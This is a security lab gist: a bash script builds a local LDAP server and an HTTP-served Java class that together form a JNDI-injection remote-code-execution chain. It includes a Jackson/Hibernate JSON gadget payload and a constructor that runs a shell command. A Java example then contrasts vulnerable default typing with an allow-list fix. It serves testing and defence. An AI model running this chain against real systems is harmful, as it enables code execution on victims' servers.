@topolik
Created August 17, 2018 20:49
Backend script based on @pwntester's JSON deserialization research
#!/bin/bash
# Lab backend for JSON -> JNDI deserialization testing:
#   1. an Apache DS LDAP server (docker) holding a javaNamingReference entry,
#   2. a PayloadObject class served over HTTP as that entry's javaCodebase.
# A JNDI lookup of ldap://localhost:10389/cn=deser,dc=example,dc=com from a
# vulnerable JVM resolves the reference, fetches PayloadObject.class from
# localhost:8000 and runs its constructor.
set -u

cleanup() {
  echo "Stopping LDAP"
  docker stop json-deser-ldap
  echo "Removing LDAP docker instance"
  docker rm json-deser-ldap
}
# Tear the container down even when the HTTP server is interrupted with CTRL+C.
trap cleanup EXIT

echo "Starting Apache DS using docker @ ldap://localhost:10389"
docker run --name json-deser-ldap -d -p 10389:10389 greggigon/apacheds
echo "... waiting 20 seconds to start Apache DS"
sleep 20

# JNDI Reference entry: javaClassName/javaFactory name the class to instantiate,
# javaCodebase is the URL the JVM loads it from. Remote codebase loading via LDAP
# is only honoured by older JDKs, or with
# -Dcom.sun.jndi.ldap.object.trustURLCodebase=true on 8u191+ / 11.0.1+.
# userPassword: secret, if used with LDAP login
(cat <<"EOF"
dn: cn=deser,dc=example,dc=com
objectClass: top
objectClass: person
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: simpleSecurityObject
objectClass: javaNamingReference
javaCodebase: http://localhost:8000/
javaFactory: PayloadObject
javaClassName: PayloadObject
cn: deser
sn: deser
givenName: deser
mail: deser@example.com
userPassword: {SHA384}WKd1ukESvjAFrkQHznV9iP2nHUBJe7gCbsrFTU4//HIyzo3jq1rLMK45dg/ufFPt
EOF
) | docker exec -i json-deser-ldap ldapadd -x -H ldap://localhost:10389 -D "uid=admin,ou=system" -w secret
echo "Created cn=deser,dc=example,dc=com entry in LDAP"

# Payload class: the no-arg constructor runs as soon as the victim JVM instantiates
# the factory. Compile with a target the victim JVM accepts (javac defaults to the
# local JDK's class version).
(cat <<"EOF"
public class PayloadObject {
    public PayloadObject() {
        try {
            System.out.println("\n\n\n\n\n\n\n\n@@@@@@@@@@@@@@\npwned\n@@@@@@@@@@@@@@\n\n\n\n\n\n\n\n\n\n");
            Runtime.getRuntime().exec("touch /tmp/pwned");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
EOF
) > PayloadObject.java; javac PayloadObject.java; rm PayloadObject.java
echo "Created PayloadObject.class"

echo "Starting HTTP server @ localhost:8000 (serves PayloadObject.class), press CTRL+C to interrupt"
# Jackson default-typing shape: ["class name", { properties }]; the setter for
# sessionFactoryJNDIName performs the JNDI lookup.
echo 'Example JSON PAYLOAD: ["org.hibernate.jmx.StatisticsService",{"sessionFactoryJNDIName":"ldap://localhost:10389/cn=deser,dc=example,dc=com"}]'
# Python 2 SimpleHTTPServer as in the original; fall back to Python 3's http.server.
if python -c "import SimpleHTTPServer" 2>/dev/null; then
  python -m SimpleHTTPServer 8000
else
  python3 -m http.server 8000
fi
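The deserialization sink this lab is aimed at, as an added example that is not part of the gist: a Jackson ObjectMapper with default typing deserializes the class name from the JSON and calls a setter that performs a JNDI lookup on the attacker-supplied URL, next to the hardened mapper that rejects the type id. Assumes Jackson 2.10+ on the classpath; `LookupBean`, `Holder` and the `com.example.dto.` prefix are hypothetical stand-ins for the Hibernate StatisticsService gadget and a real application's DTO package. Running the vulnerable path end to end against the lab also needs a JVM that still trusts remote codebases from LDAP (or `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`).

```java
// Added example, not the gist's code. Assumes Jackson 2.10+.
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import javax.naming.InitialContext;
import javax.naming.NamingException;

public class JsonJndiDemo {

    /** Hypothetical gadget: any bean whose setter does a JNDI lookup on attacker data
     *  (the role org.hibernate.jmx.StatisticsService#setSessionFactoryJNDIName plays). */
    public static class LookupBean {
        private String jndiName;
        public String getJndiName() { return jndiName; }
        public void setJndiName(String name) throws NamingException {
            this.jndiName = name;
            // The sink: an ldap:// URL makes the JVM fetch cn=deser,..., read
            // javaCodebase/javaFactory and instantiate PayloadObject from localhost:8000.
            new InitialContext().lookup(name);
        }
    }

    /** Object-typed field: with default typing the JSON chooses the concrete class. */
    public static class Holder {
        public Object data;
    }

    // Same ["class", {props}] shape as the gist's example payload, pointed at the stand-in.
    static final String PAYLOAD =
        "{\"data\":[\"JsonJndiDemo$LookupBean\","
        + "{\"jndiName\":\"ldap://localhost:10389/cn=deser,dc=example,dc=com\"}]}";

    /** Vulnerable: global default typing trusts whatever class name the JSON names. */
    static Holder vulnerable(String json) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();                  // deprecated since 2.10 for this reason
        return mapper.readValue(json, Holder.class);   // instantiates LookupBean, calls setJndiName
    }

    /** Hardened: default typing only for an explicit allow-list of subtypes. */
    static Holder hardened(String json) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(
            BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.dto.")    // hypothetical DTO package
                .build(),
            ObjectMapper.DefaultTyping.NON_FINAL);
        // LookupBean is outside the allow-list: readValue throws InvalidTypeIdException
        // before any LookupBean instance exists, so the lookup never happens.
        return mapper.readValue(json, Holder.class);
    }

    public static void main(String[] args) throws Exception {
        try {
            hardened(PAYLOAD);
            System.out.println("unexpected: hardened mapper accepted the payload");
        } catch (InvalidTypeIdException e) {
            System.out.println("hardened mapper rejected type id: " + e.getTypeId());
        }
        // Only point this at the gist's local lab.
        if (args.length > 0 && args[0].equals("--run-vulnerable")) {
            vulnerable(PAYLOAD);
        }
    }
}
```

The fix is not a bigger deny-list: Jackson's own blocklist of known gadgets grew for years after this research, and every new gadget class reopened the hole. Disabling global default typing, or activating it with a `PolymorphicTypeValidator` that allows only your own DTO types, closes the class of bug rather than one instance.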